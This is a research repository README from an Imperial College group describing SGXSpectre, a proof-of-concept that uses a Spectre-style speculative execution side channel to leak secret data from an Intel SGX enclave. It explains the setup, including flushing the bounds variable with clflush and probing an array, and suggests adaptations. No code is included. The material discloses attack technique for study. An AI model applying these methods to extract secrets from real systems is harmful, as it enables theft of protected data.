Spectre attack against SGX enclave
Sample code demonstrating a Spectre-like attack against an Intel SGX enclave.
Given our ongoing research on Intel SGX here in the LSDS group at Imperial College London, a question that occurred to us immediately on first hearing of the recent Meltdown and Spectre attacks is what are the security implications of speculative execution side channels for Intel SGX enclaves?
This repository contains a proof-of-concept attack (SGXSpectre
) showing it is
indeed possible to use a speculative execution side-channel to leak data from
an Intel SGX enclave.
The attack is similar conceptually to the conditional branch misprediction
Spectre attack of Kocher et al. The main
difference is that we move the secret data (secret
) and the victim function
(victim_function
) and overflow array (array1
) inside the
enclave. The
attacker executes victim_function
using an ecall,
passing it the index x
used to index into array1
.
SGXSpectre/main/main.c
: Contains the untrusted code to create the enclave and
mount the SGXSpectre attack.SGXSpectre/enclave/enclave_attack.c
: Contains the enclave secret data
and victim function.The attack requires that the array1_size
variable (used to verify that x
is within the bounds of array1
) must not be cached. For simplicity our
proof-of-concept currently stores array1_size
outside the enclave, allowing
the attacker to flush it with a clflush
instruction before each invocation of
the victim function. In reality this would be unsafe, since the bounds check
should not rely on a value stored in untrusted memory. However the attack could
be adapted to keep array1_size
inside the enclave by using an alternative
mechanism to flush it before each invocation (e.g. load other data whose
address coincides in the cache).
For simplicity we keep the array2
array whose entries are probed by the
attacker outside the enclave. As mentioned in the Spectre
paper, a prime+probe attack could
be used to infer the accesses to array2
if it is not accessible to the attacker
(e.g. if it is moved inside the enclave).
SGXSpectre is brought to you by Dan O'Keeffe, Divya Muthukumaran, Pierre-Louis Aublin, Florian Kelbert, Christian Priebe, Josh Lind, Huanzhou Zhu and Peter Pietzuch.